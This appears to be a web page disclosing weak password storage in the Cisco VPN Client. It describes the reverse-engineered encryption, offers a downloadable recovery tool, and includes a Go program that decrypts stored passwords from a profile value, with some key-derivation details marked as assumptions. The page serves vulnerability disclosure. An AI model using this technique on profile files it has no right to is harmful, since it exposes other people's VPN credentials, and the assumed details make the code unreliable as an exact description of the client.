Cisco Password Revealer
What's it all about?
The Cisco VPN Client uses weak encryption to store user and group passwords in your local profile file.
I coded a little tool to reveal the saved passwords from a given profile file.
The Cisco Password Revealer along with the source code can be downloaded here.
Thx to the Crypto++ Project.
The main problem with the method used to encrypt the passwords is that the whole procedure is deterministic and no user input is involved. This effectively means that the encryption keys the Cisco Client calculates can also be calculated by any other program that knows the algorithm. This algorithm has now been reverse engineered.
The algorithm
The algorithm used to encrypt a given user/group password is shown below (for further details just consult the source code):
- The current date as a string is retrieved (e.g. Mon Sep 19 20:00:00 2005)
- Then a SHA-1 hash h1 (20 bytes) is computed from it
- h1 is modified and a new hash h2 is calculated
- h1 is modified again and h3 is calculated
- The 3DES key (24 bytes) is made of h2 and the first 4 bytes of h3
- The password is encrypted using 3DES in CBC mode. The IV consists of the first 8 bytes of h1.
- The algorithm computes a last hash h4 from the encrypted password
- The key "enc_UserPassword" in our profile file now looks like this: h1|h4|encrypted password
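As an added illustration (not the tool's own code, which uses Crypto++), the following Go program models the scheme above end to end: it derives key and IV from h1 as the list describes, writes h1|h4|ciphertext the way the client does, and shows that recovery needs nothing but what is already in the profile file. The way h1 is modified before h2 and h3, the PKCS#7 padding and the hex encoding are not given above and are assumptions here; the sample date and password are constructed.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// Key and IV are functions of h1 alone, and h1 is stored beside the ciphertext.
// How the client "modifies" h1 is not stated above; the XOR tweaks are assumptions.
func deriveKeying(h1 []byte) (key, iv []byte) {
	h2 := sha1.Sum(append(h1[:19:19], h1[19]^0x01)) // assumed modification of h1
	h3 := sha1.Sum(append(h1[:19:19], h1[19]^0x03)) // assumed modification of h1
	return append(h2[:], h3[:4]...), h1[:8]         // 3DES key = h2 | h3[0:4]; IV = h1[0:8]
}

// Emulates the stored value hex(h1)|hex(h4)|hex(ciphertext); PKCS#7 padding and hex are assumed.
func storeAsClient(date, password string) string {
	h1 := sha1.Sum([]byte(date))
	key, iv := deriveKeying(h1[:])
	blk, _ := des.NewTripleDESCipher(key)
	n := 8 - len(password)%8
	buf := append([]byte(password), bytes.Repeat([]byte{byte(n)}, n)...)
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(buf, buf) // encrypt in place
	return fmt.Sprintf("%x%x%x", h1, sha1.Sum(buf), buf)
}

// Recovery uses nothing but the stored value: no date and no user secret is needed.
func recoverFromProfile(value string) (string, error) {
	raw, err := hex.DecodeString(value)
	if err != nil || len(raw) < 48 || (len(raw)-40)%8 != 0 {
		return "", fmt.Errorf("malformed enc_UserPassword value")
	}
	h1, h4, buf := raw[:20], raw[20:40], raw[40:]
	if sum := sha1.Sum(buf); !bytes.Equal(sum[:], h4) {
		return "", fmt.Errorf("h4 mismatch: value tampered or truncated")
	}
	key, iv := deriveKeying(h1)
	blk, _ := des.NewTripleDESCipher(key)
	cipher.NewCBCDecrypter(blk, iv).CryptBlocks(buf, buf) // decrypt in place
	if n := int(buf[len(buf)-1]); n >= 1 && n <= 8 {
		return string(buf[:len(buf)-n]), nil
	}
	return "", fmt.Errorf("bad padding")
}
```

The h4 check only detects a corrupted or truncated value; it adds no secrecy, because everything needed to rebuild the key is in the first 20 bytes of the value itself.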
Screenshot

P.S.: Please excuse the somewhat childish "wannabe h4x0r" style of the tool, it's from my early college days and I don't plan to change it anytime soon ;-)
| Attachment | Size |
|---|---|
| CiscoPasswordRevealer.rar | 148.94 KB |
| Cisco Password Revealer.app_.tar_.gz | 548.83 KB |
| CiscoPasswordRevealerMacOSX.tar_.gz | 590.4 KB |
| Cisco Password Revealer.src_.tar_.gz | 41.53 KB |